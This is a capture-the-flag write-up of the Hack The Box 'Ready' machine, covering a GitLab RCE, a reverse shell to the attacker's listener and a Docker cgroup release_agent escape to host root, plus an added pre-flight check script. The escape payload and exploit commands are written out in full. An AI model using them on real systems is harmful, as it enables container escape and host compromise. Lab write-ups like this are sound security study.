Hackthebox Ready WriteUp

Jim Solomon
3 min readMay 15, 2021

Overview:

Ready is an interesting box that teaches a Docker breakout. It starts with a vulnerable GitLab instance that has a public RCE exploit. After getting a shell on the box you realize you are inside a Docker container, and the container is configured in a way that lets you execute commands outside the container and get code execution as root on the host. With all that said, let's jump in!

Reconnaissance:

┌─[eu-vip-3]─[10.10.14.6]─[root@parrot]─[~/htb/boxes/ready]
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

The nmap scan shows the URL http://10.10.10.220:5080/users/sign_in; heading over there we can see a GitLab login page.

Create an account, log in, and check the GitLab version (it is shown on /help once you are logged in).

Searching public exploits for this version turns up an authenticated RCE exploit.

Start a listener first, then run the exploit with the account created above:

nc -nvlp 443
python3 exploit.py -u username -p password -g http://10.10.10.220 -l 10.10.14.x -P 443

PrivEsc to root:

In /opt/backup there are configuration files; grepping them for passwords reveals root's password, which lets us switch to root.

After getting root, I realized I'm in a Docker container. But there is a blog post that explains how to break out of Docker using the cgroup release_agent, and the payload below is based on it.

The payload mounts the rdma cgroup hierarchy under /tmp/cgrp and abuses release_agent: when the last process leaves a cgroup that has notify_on_release set, the kernel runs the release_agent program as root on the host, outside the container's namespaces. The release_agent path has to be a host path, which is why the container's overlay upperdir is read from /etc/mtab. This only works because the container has CAP_SYS_ADMIN (for example, it was started with --privileged); without that capability the cgroup mount is refused. You can change cat /root/root.txt to a reverse shell if you want.

# Mount the (unused) rdma cgroup v1 hierarchy and create a child cgroup "x"
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Ask the kernel to run release_agent when the last process leaves "x"
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of this container's overlay upper layer, so the host can find /cmd
host_path=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`
# release_agent is executed on the host as root (double quotes so $host_path expands)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
# Put a short-lived shell into "x"; when it exits, the kernel invokes /cmd on the host
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

The command runs on the host and writes the root flag to $host_path/output, which appears as /output inside the container.
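Before firing the payload it is worth confirming the three things it silently depends on: CAP_SYS_ADMIN in the container, an overlay upperdir in /etc/mtab, and an available cgroup v1 controller. The following pre-flight script is an added example and is not code from the original writeup or from the blog post it follows; the function names, the sample mtab lines and the capability masks in the usage are my own constructions (0000003fffffffff is a full root mask, 00000000a80425fb is the capability set a default Docker container commonly shows).

```shell
#!/bin/sh
# Pre-flight checks for the cgroup release_agent breakout. Added example, not
# code from the original writeup; function names and sample data are my own.

# CAP_SYS_ADMIN is capability number 21 (linux/capability.h); it is required
# to mount a cgroup hierarchy, which is the first step of the payload.
CAP_SYS_ADMIN_BIT=21

# Read /etc/mtab-style text on stdin and print the overlayfs upperdir: the
# host-side directory backing the container's writable layer. A file created
# at / inside the container shows up at <upperdir>/ on the host, which is why
# the payload points release_agent at "$host_path/cmd".
overlay_upperdir() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n 1
}

# Return 0 when a CapEff hex mask (format of /proc/self/status) has CAP_SYS_ADMIN.
has_cap_sys_admin() {
    mask="$1"
    [ -n "$mask" ] || return 1
    [ $(( (0x$mask >> CAP_SYS_ADMIN_BIT) & 1 )) -eq 1 ]
}

# Live check of the current environment: one line per prerequisite,
# returns 0 only if all of them hold. Output depends on where it is run.
breakout_preflight() {
    rc=0
    cap=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null || true)
    if has_cap_sys_admin "$cap"; then
        echo "[+] CapEff=$cap includes CAP_SYS_ADMIN"
    else
        echo "[-] CapEff=${cap:-unknown} lacks CAP_SYS_ADMIN; mount -t cgroup will be refused"
        rc=1
    fi

    upper=$(cat /etc/mtab 2>/dev/null | overlay_upperdir)
    if [ -n "$upper" ]; then
        echo "[+] overlay upperdir on the host: $upper"
    else
        echo "[-] no overlay upperdir in /etc/mtab; host path for release_agent cannot be derived this way"
        rc=1
    fi

    # release_agent is a cgroup v1 feature; any controller not already mounted will do.
    if grep -qw rdma /proc/cgroups 2>/dev/null; then
        echo "[+] rdma cgroup controller present (any unused v1 controller works)"
    else
        echo "[-] rdma controller not in /proc/cgroups; pick another controller, or the host may be cgroup v2 only"
        rc=1
    fi
    return $rc
}

# Run the live checks only when invoked with "run", so sourcing the file
# just defines the functions.
if [ "${1:-}" = "run" ]; then
    breakout_preflight
fi
```

Run it inside the container as `sh preflight.sh run`; a `[-]` line on CAP_SYS_ADMIN means the mount step of the payload will fail and the container is not privileged, a missing upperdir means `host_path` will be empty and release_agent would point at /cmd on the host instead of the container's layer.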

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP